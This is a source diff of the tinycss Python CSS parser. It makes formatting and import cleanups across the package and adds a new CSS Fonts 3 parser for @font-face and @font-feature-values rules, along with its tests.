The errors are recovered :class:`~.parsing.ParseError` in declarations.
(Parsing continues from the next declaration on such errors.)
The errors are recovered :class:`~.parsing.ParseError` in
declarations. (Parsing continues from the next declaration on such
errors.)
:raises:
:class:`~.parsing.ParseError` if the selector is invalid for the
core grammar.
@ -767,8 +772,9 @@ class CSS21Parser(object):
# CSS syntax is case-insensitive
property_name = name_token.value.lower()
else:
raise ParseError(name_token,
'expected a property name, got {0}'.format(name_token.type))
raise ParseError(
name_token, 'expected a property name, got {0}'.format(
name_token.type))
token = name_token # In case ``tokens`` is now empty
for token in tokens:

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.decoding
----------------
@ -12,11 +12,9 @@
from __future__ import unicode_literals
from binascii import unhexlify
import operator
import re
import sys
from binascii import unhexlify
__all__ = ['decode'] # Everything else is implementation detail
@ -116,101 +114,101 @@ Slice = Slicer()
ENCODING_MAGIC_NUMBERS = [
((Slice[:], ''), re.compile(
hex2re('EF BB BF 40 63 68 61 72 73 65 74 20 22')
+ b'([^\x22]*?)'
+ hex2re('22 3B')).match),
hex2re('EF BB BF 40 63 68 61 72 73 65 74 20 22') +
b'([^\x22]*?)' +
hex2re('22 3B')).match),
('UTF-8', re.compile(
hex2re('EF BB BF')).match),
((Slice[:], ''), re.compile(
hex2re('40 63 68 61 72 73 65 74 20 22')
+ b'([^\x22]*?)'
+ hex2re('22 3B')).match),
hex2re('40 63 68 61 72 73 65 74 20 22') +
b'([^\x22]*?)' +
hex2re('22 3B')).match),
((Slice[1::2], '-BE'), re.compile(
hex2re('FE FF 00 40 00 63 00 68 00 61 00 72 00 73 00 65 00'
'74 00 20 00 22')
+ b'((\x00[^\x22])*?)'
+ hex2re('00 22 00 3B')).match),
'74 00 20 00 22') +
b'((\x00[^\x22])*?)' +
hex2re('00 22 00 3B')).match),
((Slice[1::2], '-BE'), re.compile(
hex2re('00 40 00 63 00 68 00 61 00 72 00 73 00 65 00 74 00'
'20 00 22')
+ b'((\x00[^\x22])*?)'
+ hex2re('00 22 00 3B')).match),
'20 00 22') +
b'((\x00[^\x22])*?)' +
hex2re('00 22 00 3B')).match),
((Slice[::2], '-LE'), re.compile(
hex2re('FF FE 40 00 63 00 68 00 61 00 72 00 73 00 65 00 74'
'00 20 00 22 00')
+ b'(([^\x22]\x00)*?)'
+ hex2re('22 00 3B 00')).match),
'00 20 00 22 00') +
b'(([^\x22]\x00)*?)' +
hex2re('22 00 3B 00')).match),
((Slice[::2], '-LE'), re.compile(
hex2re('40 00 63 00 68 00 61 00 72 00 73 00 65 00 74 00 20'
'00 22 00')
+ b'(([^\x22]\x00)*?)'
+ hex2re('22 00 3B 00')).match),
'00 22 00') +
b'(([^\x22]\x00)*?)' +
hex2re('22 00 3B 00')).match),
((Slice[3::4], '-BE'), re.compile(
hex2re('00 00 FE FF 00 00 00 40 00 00 00 63 00 00 00 68 00'
'00 00 61 00 00 00 72 00 00 00 73 00 00 00 65 00 00'
'00 74 00 00 00 20 00 00 00 22')
+ b'((\x00\x00\x00[^\x22])*?)'
+ hex2re('00 00 00 22 00 00 00 3B')).match),
'00 74 00 00 00 20 00 00 00 22') +
b'((\x00\x00\x00[^\x22])*?)' +
hex2re('00 00 00 22 00 00 00 3B')).match),
((Slice[3::4], '-BE'), re.compile(
hex2re('00 00 00 40 00 00 00 63 00 00 00 68 00 00 00 61 00'
'00 00 72 00 00 00 73 00 00 00 65 00 00 00 74 00 00'
'00 20 00 00 00 22')
+ b'((\x00\x00\x00[^\x22])*?)'
+ hex2re('00 00 00 22 00 00 00 3B')).match),
'00 20 00 00 00 22') +
b'((\x00\x00\x00[^\x22])*?)' +
hex2re('00 00 00 22 00 00 00 3B')).match),
# Python does not support 2143 or 3412 endianness, AFAIK.
# I guess we could fix it up ourselves but meh. Patches welcome.
# Python does not support 2143 or 3412 endianness, AFAIK.
# I guess we could fix it up ourselves but meh. Patches welcome.
# ((Slice[2::4], '-2143'), re.compile(
# hex2re('00 00 FF FE 00 00 40 00 00 00 63 00 00 00 68 00 00'
# '00 61 00 00 00 72 00 00 00 73 00 00 00 65 00 00 00'
# '74 00 00 00 20 00 00 00 22 00')
# + b'((\x00\x00[^\x22]\x00)*?)'
# + hex2re('00 00 22 00 00 00 3B 00')).match),
# ((Slice[2::4], '-2143'), re.compile(
# hex2re('00 00 FF FE 00 00 40 00 00 00 63 00 00 00 68 00 00'
# '00 61 00 00 00 72 00 00 00 73 00 00 00 65 00 00 00'
# '74 00 00 00 20 00 00 00 22 00') +
# b'((\x00\x00[^\x22]\x00)*?)' +
# hex2re('00 00 22 00 00 00 3B 00')).match),
# ((Slice[2::4], '-2143'), re.compile(
# hex2re('00 00 40 00 00 00 63 00 00 00 68 00 00 00 61 00 00'
# '00 72 00 00 00 73 00 00 00 65 00 00 00 74 00 00 00'
# '20 00 00 00 22 00')
# + b'((\x00\x00[^\x22]\x00)*?)'
# + hex2re('00 00 22 00 00 00 3B 00')).match),
# ((Slice[2::4], '-2143'), re.compile(
# hex2re('00 00 40 00 00 00 63 00 00 00 68 00 00 00 61 00 00'
# '00 72 00 00 00 73 00 00 00 65 00 00 00 74 00 00 00'
# '20 00 00 00 22 00') +
# b'((\x00\x00[^\x22]\x00)*?)' +
# hex2re('00 00 22 00 00 00 3B 00')).match),
# ((Slice[1::4], '-3412'), re.compile(
# hex2re('FE FF 00 00 00 40 00 00 00 63 00 00 00 68 00 00 00'
# '61 00 00 00 72 00 00 00 73 00 00 00 65 00 00 00 74'
# '00 00 00 20 00 00 00 22 00 00')
# + b'((\x00[^\x22]\x00\x00)*?)'
# + hex2re('00 22 00 00 00 3B 00 00')).match),
# ((Slice[1::4], '-3412'), re.compile(
# hex2re('FE FF 00 00 00 40 00 00 00 63 00 00 00 68 00 00 00'
# '61 00 00 00 72 00 00 00 73 00 00 00 65 00 00 00 74'
# '00 00 00 20 00 00 00 22 00 00') +
# b'((\x00[^\x22]\x00\x00)*?)' +
# hex2re('00 22 00 00 00 3B 00 00')).match),
# ((Slice[1::4], '-3412'), re.compile(
# hex2re('00 40 00 00 00 63 00 00 00 68 00 00 00 61 00 00 00'
# '72 00 00 00 73 00 00 00 65 00 00 00 74 00 00 00 20'
# '00 00 00 22 00 00')
# + b'((\x00[^\x22]\x00\x00)*?)'
# + hex2re('00 22 00 00 00 3B 00 00')).match),
# ((Slice[1::4], '-3412'), re.compile(
# hex2re('00 40 00 00 00 63 00 00 00 68 00 00 00 61 00 00 00'
# '72 00 00 00 73 00 00 00 65 00 00 00 74 00 00 00 20'
# '00 00 00 22 00 00') +
# b'((\x00[^\x22]\x00\x00)*?)' +
# hex2re('00 22 00 00 00 3B 00 00')).match),
((Slice[::4], '-LE'), re.compile(
hex2re('FF FE 00 00 40 00 00 00 63 00 00 00 68 00 00 00 61'
'00 00 00 72 00 00 00 73 00 00 00 65 00 00 00 74 00'
'00 00 20 00 00 00 22 00 00 00')
+ b'(([^\x22]\x00\x00\x00)*?)'
+ hex2re('22 00 00 00 3B 00 00 00')).match),
'00 00 20 00 00 00 22 00 00 00') +
b'(([^\x22]\x00\x00\x00)*?)' +
hex2re('22 00 00 00 3B 00 00 00')).match),
((Slice[::4], '-LE'), re.compile(
hex2re('40 00 00 00 63 00 00 00 68 00 00 00 61 00 00 00 72'
'00 00 00 73 00 00 00 65 00 00 00 74 00 00 00 20 00'
'00 00 22 00 00 00')
+ b'(([^\x22]\x00\x00\x00)*?)'
+ hex2re('22 00 00 00 3B 00 00 00')).match),
'00 00 22 00 00 00') +
b'(([^\x22]\x00\x00\x00)*?)' +
hex2re('22 00 00 00 3B 00 00 00')).match),
('UTF-32-BE', re.compile(
hex2re('00 00 FE FF')).match),
@ -218,11 +216,11 @@ ENCODING_MAGIC_NUMBERS = [
('UTF-32-LE', re.compile(
hex2re('FF FE 00 00')).match),
# ('UTF-32-2143', re.compile(
# hex2re('00 00 FF FE')).match),
# ('UTF-32-2143', re.compile(
# hex2re('00 00 FF FE')).match),
# ('UTF-32-3412', re.compile(
# hex2re('FE FF 00 00')).match),
# ('UTF-32-3412', re.compile(
# hex2re('FE FF 00 00')).match),
('UTF-16-BE', re.compile(
hex2re('FE FF')).match),
@ -231,24 +229,24 @@ ENCODING_MAGIC_NUMBERS = [
hex2re('FF FE')).match),
# Some of there are supported by Python, but I didnt bother.
# You know the story with patches ...
# Some of there are supported by Python, but I didnt bother.
# You know the story with patches ...
# # as specified, transcoded from EBCDIC to ASCII
# ('as_specified-EBCDIC', re.compile(
# hex2re('7C 83 88 81 99 A2 85 A3 40 7F')
# + b'([^\x7F]*?)'
# + hex2re('7F 5E')).match),
# # as specified, transcoded from EBCDIC to ASCII
# ('as_specified-EBCDIC', re.compile(
# hex2re('7C 83 88 81 99 A2 85 A3 40 7F')
# + b'([^\x7F]*?)'
# + hex2re('7F 5E')).match),
# # as specified, transcoded from IBM1026 to ASCII
# ('as_specified-IBM1026', re.compile(
# hex2re('AE 83 88 81 99 A2 85 A3 40 FC')
# + b'([^\xFC]*?)'
# + hex2re('FC 5E')).match),
# # as specified, transcoded from IBM1026 to ASCII
# ('as_specified-IBM1026', re.compile(
# hex2re('AE 83 88 81 99 A2 85 A3 40 FC')
# + b'([^\xFC]*?)'
# + hex2re('FC 5E')).match),
# # as specified, transcoded from GSM 03.38 to ASCII
# ('as_specified-GSM_03.38', re.compile(
# hex2re('00 63 68 61 72 73 65 74 20 22')
# + b'([^\x22]*?)'
# + hex2re('22 3B')).match),
# # as specified, transcoded from GSM 03.38 to ASCII
# ('as_specified-GSM_03.38', re.compile(
# hex2re('00 63 68 61 72 73 65 74 20 22')
# + b'([^\x22]*?)'
# + hex2re('22 3B')).match),
]

View File

@ -0,0 +1,200 @@
# coding: utf-8
"""
tinycss.colors3
---------------
Parser for CSS 3 Fonts syntax:
https://www.w3.org/TR/css-fonts-3/
Adds support for font-face and font-feature-values rules.
:copyright: (c) 2016 by Kozea.
:license: BSD, see LICENSE for more details.
"""
from __future__ import division, unicode_literals
from .css21 import CSS21Parser, ParseError
class FontFaceRule(object):
"""A parsed at-rule for font faces.
.. attribute:: at_keyword
Always ``'@font-face'``.
.. attribute:: declarations
A list of :class:`~.css21.Declaration` objects.
.. attribute:: line
Source line where this was read.
.. attribute:: column
Source column where this was read.
"""
def __init__(self, at_keyword, declarations, line, column):
assert at_keyword == '@font-face'
self.at_keyword = at_keyword
self.declarations = declarations
self.line = line
self.column = column
class FontFeatureValuesRule(object):
"""A parsed at-rule for font feature values.
.. attribute:: at_keyword
Always ``'@font-feature-values'``.
.. attribute:: line
Source line where this was read.
.. attribute:: column
Source column where this was read.
.. attribute:: at_rules
The list of parsed at-rules inside the @font-feature-values block, in
source order.
.. attribute:: family_names
A list of strings representing font families.
"""
def __init__(self, at_keyword, at_rules, family_names, line, column):
assert at_keyword == '@font-feature-values'
self.at_keyword = at_keyword
self.family_names = family_names
self.at_rules = at_rules
self.line = line
self.column = column
class FontFeatureRule(object):
"""A parsed at-rule for font features.
.. attribute:: at_keyword
One of the 16 following strings:
* ``@stylistic``
* ``@styleset``
* ``@character-variant``
* ``@swash``
* ``@ornaments``
* ``@annotation``
.. attribute:: declarations
A list of :class:`~.css21.Declaration` objects.
.. attribute:: line
Source line where this was read.
.. attribute:: column
Source column where this was read.
"""
def __init__(self, at_keyword, declarations, line, column):
self.at_keyword = at_keyword
self.declarations = declarations
self.line = line
self.column = column
class CSSFonts3Parser(CSS21Parser):
"""Extend :class:`~.css21.CSS21Parser` for `CSS 3 Fonts`_ syntax.
.. _CSS 3 Fonts: https://www.w3.org/TR/css-fonts-3/
"""
FONT_FEATURE_VALUES_AT_KEYWORDS = [
'@stylistic',
'@styleset',
'@character-variant',
'@swash',
'@ornaments',
'@annotation',
]
def parse_at_rule(self, rule, previous_rules, errors, context):
if rule.at_keyword == '@font-face':
if rule.head:
raise ParseError(
rule.head[0],
'unexpected {0} token in {1} rule header'.format(
rule.head[0].type, rule.at_keyword))
declarations, body_errors = self.parse_declaration_list(rule.body)
errors.extend(body_errors)
return FontFaceRule(
rule.at_keyword, declarations, rule.line, rule.column)
elif rule.at_keyword == '@font-feature-values':
family_names = tuple(
self.parse_font_feature_values_family_names(rule.head))
at_rules, body_errors = (
self.parse_rules(rule.body or [], '@font-feature-values'))
errors.extend(body_errors)
return FontFeatureValuesRule(
rule.at_keyword, at_rules, family_names,
rule.line, rule.column)
elif rule.at_keyword in self.FONT_FEATURE_VALUES_AT_KEYWORDS:
if context != '@font-feature-values':
raise ParseError(
rule, '{0} rule not allowed in {1}'.format(
rule.at_keyword, context))
declarations, body_errors = self.parse_declaration_list(rule.body)
errors.extend(body_errors)
return FontFeatureRule(
rule.at_keyword, declarations, rule.line, rule.column)
return super(CSSFonts3Parser, self).parse_at_rule(
rule, previous_rules, errors, context)
def parse_font_feature_values_family_names(self, tokens):
"""Parse an @font-feature-values selector.
:param tokens:
An iterable of token, typically from the ``head`` attribute of
an unparsed :class:`AtRule`.
:returns:
A generator of strings representing font families.
:raises:
:class:`~.parsing.ParseError` on invalid selectors
"""
family = ''
current_string = False
for token in tokens:
if token.type == 'DELIM' and token.value == ',' and family:
yield family
family = ''
current_string = False
elif token.type == 'STRING' and not family and (
current_string is False):
family = token.value
current_string = True
elif token.type == 'IDENT' and not current_string:
if family:
family += ' '
family += token.value
elif token.type != 'S':
family = ''
break
if family:
yield family
else:
raise ParseError(token, 'invalid @font-feature-values selector')

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.page3
------------------
@ -12,7 +12,8 @@
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals, division
from __future__ import division, unicode_literals
from .css21 import CSS21Parser, ParseError
@ -107,21 +108,21 @@ class CSSPage3Parser(CSS21Parser):
'@right-bottom',
]
at_page_allowed_contexts = ['stylesheet', '@media']
def parse_at_rule(self, rule, previous_rules, errors, context):
if rule.at_keyword in self.PAGE_MARGIN_AT_KEYWORDS:
if context != '@page':
raise ParseError(rule,
'%s rule not allowed in %s' % (rule.at_keyword, context))
raise ParseError(
rule, '{0} rule not allowed in {1}'.format(
rule.at_keyword, context))
if rule.head:
raise ParseError(rule.head[0],
'unexpected %s token in %s rule header'
% (rule.head[0].type, rule.at_keyword))
raise ParseError(
rule.head[0],
'unexpected {0} token in {1} rule header'.format(
rule.head[0].type, rule.at_keyword))
declarations, body_errors = self.parse_declaration_list(rule.body)
errors.extend(body_errors)
return MarginRule(rule.at_keyword, declarations,
rule.line, rule.column)
return MarginRule(
rule.at_keyword, declarations, rule.line, rule.column)
return super(CSSPage3Parser, self).parse_at_rule(
rule, previous_rules, errors, context)
@ -149,11 +150,9 @@ class CSSPage3Parser(CSS21Parser):
else:
name = None
name_specificity = (0,)
if (len(head) == 2 and head[0].type == ':'
and head[1].type == 'IDENT'):
if (len(head) == 2 and head[0].type == ':' and
head[1].type == 'IDENT'):
pseudo_class = head[1].value
# :blank is defined in GCPM:
# http://dev.w3.org/csswg/css3-gcpm/#styling-blank-pages
specificity = {
'first': (1, 0), 'blank': (1, 0),
'left': (0, 1), 'right': (0, 1),

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.parsing
---------------
@ -95,6 +95,7 @@ def validate_value(tokens):
else:
validate_any(token, 'property value')
def validate_block(tokens, context):
"""
:raises:
@ -132,8 +133,8 @@ def validate_any(token, context):
adjective = 'unmatched'
else:
adjective = 'unexpected'
raise ParseError(token,
'{0} {1} token in {2}'.format(adjective, type_, context))
raise ParseError(
token, '{0} {1} token in {2}'.format(adjective, type_, context))
class ParseError(ValueError):

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.speedups
----------------

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
Test suite for tinycss
----------------------
@ -10,6 +10,14 @@
from __future__ import unicode_literals
import sys
# Awful workaround to fix isort's "sys.setdefaultencoding('utf-8')".
if sys.version_info[0] == 2:
reload(sys) # noqa
sys.setdefaultencoding('ascii')
def assert_errors(errors, expected_errors):
"""Test not complete error messages but only substrings."""

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
Speed tests
-----------
@ -11,13 +11,13 @@
"""
from __future__ import unicode_literals, division
from __future__ import division, unicode_literals
import sys
import os.path
import contextlib
import timeit
import functools
import os.path
import sys
import timeit
from cssutils import parseString
@ -25,7 +25,6 @@ from .. import tokenizer
from ..css21 import CSS21Parser
from ..parsing import remove_whitespace
CSS_REPEAT = 4
TIMEIT_REPEAT = 3
TIMEIT_NUMBER = 20
@ -82,8 +81,6 @@ def parse_cssutils():
def check_consistency():
result = parse_python()
#import pprint
#pprint.pprint(result)
assert len(result) > 0
if tokenizer.cython_tokenize_flat:
assert parse_cython() == result

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
Tests for the public API
------------------------
@ -9,10 +9,8 @@
from __future__ import unicode_literals
import itertools
from pytest import raises
from tinycss import make_parser
from tinycss.page3 import CSSPage3Parser

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
Tests for the CSS 3 color parser
--------------------------------
@ -11,8 +11,7 @@
from __future__ import unicode_literals
import pytest
from tinycss.color3 import parse_color_string, hsl_to_rgb
from tinycss.color3 import hsl_to_rgb, parse_color_string
@pytest.mark.parametrize(('css_source', 'expected_result'), [
@ -172,30 +171,30 @@ def test_color(css_source, expected_result):
@pytest.mark.parametrize(('hsl', 'expected_rgb'), [
# http://en.wikipedia.org/wiki/HSL_and_HSV#Examples
((0, 0, 100 ), (1, 1, 1 )),
((127, 0, 100 ), (1, 1, 1 )),
((0, 0, 50 ), (0.5, 0.5, 0.5 )),
((127, 0, 50 ), (0.5, 0.5, 0.5 )),
((0, 0, 0 ), (0, 0, 0 )),
((127, 0, 0 ), (0, 0, 0 )),
((0, 100, 50 ), (1, 0, 0 )),
((60, 100, 37.5), (0.75, 0.75, 0 )),
((780, 100, 37.5), (0.75, 0.75, 0 )),
((-300, 100, 37.5), (0.75, 0.75, 0 )),
((120, 100, 25 ), (0, 0.5, 0 )),
((180, 100, 75 ), (0.5, 1, 1 )),
((240, 100, 75 ), (0.5, 0.5, 1 )),
((300, 50, 50 ), (0.75, 0.25, 0.75 )),
((61.8, 63.8, 39.3), (0.628, 0.643, 0.142)),
((251.1, 83.2, 51.1), (0.255, 0.104, 0.918)),
((134.9, 70.7, 39.6), (0.116, 0.675, 0.255)),
((49.5, 89.3, 49.7), (0.941, 0.785, 0.053)),
((283.7, 77.5, 54.2), (0.704, 0.187, 0.897)),
((14.3, 81.7, 62.4), (0.931, 0.463, 0.316)),
((56.9, 99.1, 76.5), (0.998, 0.974, 0.532)),
((162.4, 77.9, 44.7), (0.099, 0.795, 0.591)),
((248.3, 60.1, 37.3), (0.211, 0.149, 0.597)),
((240.5, 29, 60.7), (0.495, 0.493, 0.721)),
((0, 0, 100 ), (1, 1, 1 )), # noqa
((127, 0, 100 ), (1, 1, 1 )), # noqa
((0, 0, 50 ), (0.5, 0.5, 0.5 )), # noqa
((127, 0, 50 ), (0.5, 0.5, 0.5 )), # noqa
((0, 0, 0 ), (0, 0, 0 )), # noqa
((127, 0, 0 ), (0, 0, 0 )), # noqa
((0, 100, 50 ), (1, 0, 0 )), # noqa
((60, 100, 37.5), (0.75, 0.75, 0 )), # noqa
((780, 100, 37.5), (0.75, 0.75, 0 )), # noqa
((-300, 100, 37.5), (0.75, 0.75, 0 )), # noqa
((120, 100, 25 ), (0, 0.5, 0 )), # noqa
((180, 100, 75 ), (0.5, 1, 1 )), # noqa
((240, 100, 75 ), (0.5, 0.5, 1 )), # noqa
((300, 50, 50 ), (0.75, 0.25, 0.75 )), # noqa
((61.8, 63.8, 39.3), (0.628, 0.643, 0.142)), # noqa
((251.1, 83.2, 51.1), (0.255, 0.104, 0.918)), # noqa
((134.9, 70.7, 39.6), (0.116, 0.675, 0.255)), # noqa
((49.5, 89.3, 49.7), (0.941, 0.785, 0.053)), # noqa
((283.7, 77.5, 54.2), (0.704, 0.187, 0.897)), # noqa
((14.3, 81.7, 62.4), (0.931, 0.463, 0.316)), # noqa
((56.9, 99.1, 76.5), (0.998, 0.974, 0.532)), # noqa
((162.4, 77.9, 44.7), (0.099, 0.795, 0.591)), # noqa
((248.3, 60.1, 37.3), (0.211, 0.149, 0.597)), # noqa
((240.5, 29, 60.7), (0.495, 0.493, 0.721)), # noqa
])
def test_hsl(hsl, expected_rgb):
for got, expected in zip(hsl_to_rgb(*hsl), expected_rgb):

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
Tests for the CSS 2.1 parser
----------------------------
@ -9,16 +9,16 @@
from __future__ import unicode_literals
import io
import os
import tempfile
import pytest
from tinycss.css21 import CSS21Parser
from .test_tokenizer import jsonify
from . import assert_errors
from .test_tokenizer import jsonify
def parse_bytes(css_bytes, kwargs):
@ -49,7 +49,7 @@ def parse_filename(css_bytes, kwargs):
('@import "é";'.encode('utf8'), {}, 'é'),
('@import "é";'.encode('utf16'), {}, 'é'), # with a BOM
('@import "é";'.encode('latin1'), {}, 'é'),
('@import "£";'.encode('Shift-JIS'), {}, '\x81\x92'), # latin1 mojibake
('@import "£";'.encode('Shift-JIS'), {}, '\x81\x92'), # lat1 mojibake
('@charset "Shift-JIS";@import "£";'.encode('Shift-JIS'), {}, '£'),
(' @charset "Shift-JIS";@import "£";'.encode('Shift-JIS'), {},
'\x81\x92'),
@ -77,7 +77,8 @@ def test_bytes(css_bytes, kwargs, expected_result, parse):
('foo{} @lipsum{} bar{}', 2,
['unknown at-rule in stylesheet context: @lipsum']),
('@charset "ascii"; foo {}', 1, []),
(' @charset "ascii"; foo {}', 1, ['mis-placed or malformed @charset rule']),
(' @charset "ascii"; foo {}', 1, [
'mis-placed or malformed @charset rule']),
('@charset ascii; foo {}', 1, ['mis-placed or malformed @charset rule']),
('foo {} @charset "ascii";', 1, ['mis-placed or malformed @charset rule']),
])
@ -109,8 +110,8 @@ def test_at_rules(css_source, expected_rules, expected_errors):
('a{b:4}', [('a', [('b', [('INTEGER', 4)])])], []),
('@page {\t b: 4; @margin}', [('@page', [], [
('S', '\t '), ('IDENT', 'b'), (':', ':'), ('S', ' '), ('INTEGER', 4),
(';', ';'), ('S', ' '), ('ATKEYWORD', '@margin'),
('S', '\t '), ('IDENT', 'b'), (':', ':'), ('S', ' '), ('INTEGER', 4),
(';', ';'), ('S', ' '), ('ATKEYWORD', '@margin'),
])], []),
('foo', [], ['no declaration block found']),

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
Tests for decoding bytes to Unicode
-----------------------------------
@ -11,7 +11,6 @@
from __future__ import unicode_literals
import pytest
from tinycss.decoding import decode
@ -30,13 +29,13 @@ def params(css, encoding, use_bom=False, expect_error=False, **kwargs):
params('£', 'ShiftJIS', linking_encoding='Shift-JIS'),
params('£', 'ShiftJIS', document_encoding='Shift-JIS'),
params('£', 'ShiftJIS', protocol_encoding='utf8',
document_encoding='ShiftJIS'),
document_encoding='ShiftJIS'),
params('@charset "utf8"; £', 'ShiftJIS', expect_error=True),
params('@charset "utf£8"; £', 'ShiftJIS', expect_error=True),
params('@charset "unknown-encoding"; £', 'ShiftJIS', expect_error=True),
params('@charset "utf8"; £', 'ShiftJIS', document_encoding='ShiftJIS'),
params('£', 'ShiftJIS', linking_encoding='utf8',
document_encoding='ShiftJIS'),
document_encoding='ShiftJIS'),
params('@charset "utf-32"; 𐂃', 'utf-32-be'),
params('@charset "Shift-JIS"; £', 'ShiftJIS'),
params('@charset "ISO-8859-8"; £', 'ShiftJIS', expect_error=True),

View File

@ -0,0 +1,144 @@
# coding: utf-8
"""
Tests for the Fonts 3 parser
----------------------------
:copyright: (c) 2016 by Kozea.
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals
import pytest
from tinycss.fonts3 import CSSFonts3Parser
from . import assert_errors
from .test_tokenizer import jsonify
@pytest.mark.parametrize(('css', 'expected_family_names', 'expected_errors'), [
('@font-feature-values foo {}', ('foo',), []),
('@font-feature-values Foo Test {}', ('Foo Test',), []),
('@font-feature-values \'Foo Test\' {}', ('Foo Test',), []),
('@font-feature-values Foo Test, Foo Lol, "Foo tooo"', (
'Foo Test', 'Foo Lol', 'Foo tooo'), []),
('@font-feature-values Foo , Foo lol {}', ('Foo', 'Foo lol'), []),
('@font-feature-values Foo , "Foobar" , Lol {}', (
'Foo', 'Foobar', 'Lol'), []),
('@font-feature-values Foo, {}', None, [
'invalid @font-feature-values selector']),
('@font-feature-values ,Foo {}', None, [
'invalid @font-feature-values selector']),
('@font-feature-values Test,"Foo", {}', None, [
'invalid @font-feature-values selector']),
('@font-feature-values Test "Foo" {}', None, [
'invalid @font-feature-values selector']),
('@font-feature-values Test Foo, Test "bar", "foo" {}', None, [
'invalid @font-feature-values selector']),
('@font-feature-values Test/Foo {}', None, [
'invalid @font-feature-values selector']),
('@font-feature-values /Foo {}', None, [
'invalid @font-feature-values selector']),
('@font-feature-values #Foo {}', None, [
'invalid @font-feature-values selector']),
# TODO: this currently works but should not work
# ('@font-feature-values test@foo {}', None, [
# 'invalid @font-feature-values selector']),
('@font-feature-values Hawaii 5-0 {}', None, [
'invalid @font-feature-values selector']),
])
def test_font_feature_values_selectors(css, expected_family_names,
expected_errors):
stylesheet = CSSFonts3Parser().parse_stylesheet(css)
assert_errors(stylesheet.errors, expected_errors)
if stylesheet.rules:
assert len(stylesheet.rules) == 1
rule = stylesheet.rules[0]
assert rule.at_keyword == '@font-feature-values'
assert rule.family_names == expected_family_names
@pytest.mark.parametrize(('css', 'expected_declarations', 'expected_errors'), [
('@font-face {}', [], []),
('@font-face test { src: "lol"; font-family: "bar" }', None, [
'unexpected IDENT token in @font-face rule header']),
('@font-face { src: "lol"; font-family: "bar" }', [
('src', [('STRING', 'lol')]),
('font-family', [('STRING', 'bar')])], []),
('@font-face { src: "lol"; font-family: "bar"; src: "baz" }', [
('src', [('STRING', 'lol')]),
('font-family', [('STRING', 'bar')]),
('src', [('STRING', 'baz')])], []),
])
def test_font_face_content(css, expected_declarations, expected_errors):
stylesheet = CSSFonts3Parser().parse_stylesheet(css)
assert_errors(stylesheet.errors, expected_errors)
def declarations(rule):
return [(decl.name, list(jsonify(decl.value)))
for decl in rule.declarations]
if expected_declarations is None:
assert stylesheet.rules == []
assert expected_errors
else:
assert len(stylesheet.rules) == 1
rule = stylesheet.rules[0]
assert rule.at_keyword == '@font-face'
assert declarations(rule) == expected_declarations
@pytest.mark.parametrize(
('css', 'expected_rules', 'expected_errors'), [
('''@annotation{}''', None, [
'@annotation rule not allowed in stylesheet']),
('''@font-feature-values foo {}''', None, []),
('''@font-feature-values foo {
@swash { ornate: 1; }
@styleset { double-W: 14; sharp-terminals: 16 1; }
}''', [
('@swash', [('ornate', [('INTEGER', 1)])]),
('@styleset', [
('double-w', [('INTEGER', 14)]),
('sharp-terminals', [
('INTEGER', 16), ('S', ' '), ('INTEGER', 1)])])], []),
('''@font-feature-values foo {
@swash { ornate: 14; }
@unknown { test: 1; }
}''', [('@swash', [('ornate', [('INTEGER', 14)])])], [
'unknown at-rule in @font-feature-values context: @unknown']),
('''@font-feature-values foo {
@annotation{boxed:1}
bad: 2;
@brokenstylesetbecauseofbadabove { sharp: 1}
@styleset { sharp-terminals: 16 1; @bad {}}
@styleset { @bad {} top-ignored: 3; top: 9000}
really-bad
}''', [
('@annotation', [('boxed', [('INTEGER', 1)])]),
('@styleset', [
('sharp-terminals', [
('INTEGER', 16), ('S', ' '), ('INTEGER', 1)])]),
('@styleset', [('top', [('INTEGER', 9000)])])], [
'unexpected ; token in selector',
'expected a property name, got ATKEYWORD',
'expected a property name, got ATKEYWORD',
'no declaration block found for ruleset']),
])
def test_font_feature_values_content(css, expected_rules, expected_errors):
stylesheet = CSSFonts3Parser().parse_stylesheet(css)
assert_errors(stylesheet.errors, expected_errors)
if expected_rules is not None:
assert len(stylesheet.rules) == 1
rule = stylesheet.rules[0]
assert rule.at_keyword == '@font-feature-values'
rules = [
(at_rule.at_keyword, [
(decl.name, list(jsonify(decl.value)))
for decl in at_rule.declarations])
for at_rule in rule.at_rules] if rule.at_rules else None
assert rules == expected_rules

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
Tests for the Paged Media 3 parser
----------------------------------
@ -11,11 +11,10 @@
from __future__ import unicode_literals
import pytest
from tinycss.css21 import CSS21Parser
from tinycss.page3 import CSSPage3Parser
from .test_tokenizer import jsonify
from . import assert_errors
from .test_tokenizer import jsonify
@pytest.mark.parametrize(('css', 'expected_selector',
@ -57,7 +56,7 @@ def test_selectors(css, expected_selector, expected_specificity,
@pytest.mark.parametrize(('css', 'expected_declarations',
'expected_rules','expected_errors'), [
'expected_rules', 'expected_errors'), [
('@page {}', [], [], []),
('@page { foo: 4; bar: z }',
[('foo', [('INTEGER', 4)]), ('bar', [('IDENT', 'z')])], [], []),
@ -69,7 +68,7 @@ def test_selectors(css, expected_selector, expected_specificity,
[('foo', [('INTEGER', 4)]), ('bar', [('IDENT', 'z')])],
[('@top-center', [('content', [('STRING', 'Awesome Title')])]),
('@bottom-left', [('content', [
('FUNCTION', 'counter', [('IDENT', 'page')])])])],
('FUNCTION', 'counter', [('IDENT', 'page')])])])],
[]),
('''@page { foo: 4;
@bottom-top { content: counter(page) }
@ -100,21 +99,3 @@ def test_content(css, expected_declarations, expected_rules, expected_errors):
rules = [(margin_rule.at_keyword, declarations(margin_rule))
for margin_rule in rule.at_rules]
assert rules == expected_rules
def test_in_at_media():
css = '@media print { @page { size: A4 } }'
stylesheet = CSS21Parser().parse_stylesheet(css)
